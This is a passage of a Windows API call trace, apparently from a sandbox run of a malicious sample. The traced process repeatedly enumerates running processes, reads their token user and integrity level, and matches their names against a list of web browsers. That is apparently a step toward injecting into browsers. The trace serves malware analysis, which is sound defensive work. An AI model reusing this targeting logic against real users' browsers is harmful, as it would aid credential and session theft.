returned 1 [0233.008] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0233.008] CloseHandle (hObject=0x340) returned 1 [0233.008] CloseHandle (hObject=0x548) returned 1 [0233.008] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0233.008] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0233.008] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0233.008] GetLastError () returned 0x7a [0233.008] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0233.008] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0233.008] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0233.008] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0233.008] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0233.008] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0233.008] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0233.008] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0233.008] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0233.008] VirtualFree (lpAddress=0x340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.009] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0235.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0xfcfadc | out: SystemInformation=0x0, ResultLength=0xfcfadc*=0xc0a0) returned 0xc0000004 [0235.039] VirtualAlloc (lpAddress=0x0, dwSize=0xd0a0, flAllocationType=0x1000, flProtect=0x4) returned 0x340000 [0235.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x340000, Length=0xd0a0, ResultLength=0x0 | out: SystemInformation=0x340000, ResultLength=0x0) returned 0x0 [0235.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0235.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0235.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0235.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0235.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0235.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0235.041] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0235.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0235.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0235.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0235.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0235.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0235.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0235.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0235.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0235.042] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0235.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0235.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0235.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0235.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0235.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0235.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x548 [0235.043] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.043] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.044] GetLastError () returned 0x7a [0235.044] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.044] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0235.044] CloseHandle (hObject=0x340) returned 1 [0235.044] CloseHandle (hObject=0x548) returned 1 [0235.044] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.045] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.045] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.045] GetLastError () returned 0x7a [0235.045] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.045] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.045] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.045] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0235.045] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0235.045] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0235.046] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0235.046] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0235.046] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0235.046] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x548 [0235.046] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.046] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.046] GetLastError () returned 0x7a [0235.046] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.046] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0235.047] CloseHandle (hObject=0x340) returned 1 [0235.047] CloseHandle (hObject=0x548) returned 1 [0235.047] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.047] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.047] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.047] GetLastError () returned 0x7a [0235.047] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.048] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.048] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.048] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0235.048] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0235.048] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0235.048] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0235.048] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0235.048] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0235.048] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x548 [0235.048] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.049] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.049] GetLastError () returned 0x7a [0235.049] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.049] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0235.049] CloseHandle (hObject=0x340) returned 1 [0235.049] CloseHandle (hObject=0x548) returned 1 [0235.049] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.049] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.050] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.050] GetLastError () returned 0x7a [0235.050] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.050] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.050] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.050] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0235.050] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0235.050] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0235.050] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0235.051] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0235.051] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0235.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0235.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0235.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x548 [0235.051] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.051] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.051] GetLastError () returned 0x7a [0235.051] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.052] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0235.052] CloseHandle (hObject=0x340) returned 1 [0235.052] CloseHandle (hObject=0x548) returned 1 [0235.052] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.052] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.052] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.053] GetLastError () returned 0x7a [0235.053] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.053] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.053] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.053] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0235.053] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0235.053] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0235.053] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0235.053] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0235.053] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0235.053] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x548 [0235.053] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.053] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.053] GetLastError () returned 0x7a [0235.054] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.054] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0235.054] CloseHandle (hObject=0x340) returned 1 [0235.054] CloseHandle (hObject=0x548) returned 1 [0235.054] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.054] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.054] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.054] GetLastError () returned 0x7a [0235.054] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.054] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.054] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.055] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0235.055] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0235.055] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0235.055] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0235.055] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0235.055] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0235.055] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x548 [0235.055] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.055] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.055] GetLastError () returned 0x7a [0235.055] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.055] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0235.055] CloseHandle (hObject=0x340) returned 1 [0235.056] CloseHandle (hObject=0x548) returned 1 [0235.056] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.056] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.056] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.056] GetLastError () returned 0x7a [0235.056] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.056] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.056] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.056] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0235.056] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0235.056] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0235.056] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0235.057] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0235.057] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0235.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x548 [0235.057] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.057] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.057] GetLastError () returned 0x7a [0235.057] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.057] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0235.057] CloseHandle (hObject=0x340) returned 1 [0235.057] CloseHandle (hObject=0x548) returned 1 [0235.057] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0235.057] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0235.057] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0235.057] GetLastError () returned 0x7a [0235.058] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0235.058] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0235.058] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0235.058] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0235.058] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0235.058] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0235.058] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0235.058] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0235.058] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0235.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x548 [0235.058] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0235.058] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0235.058] GetLastError () returned 0x7a [0235.058] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0235.058] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, 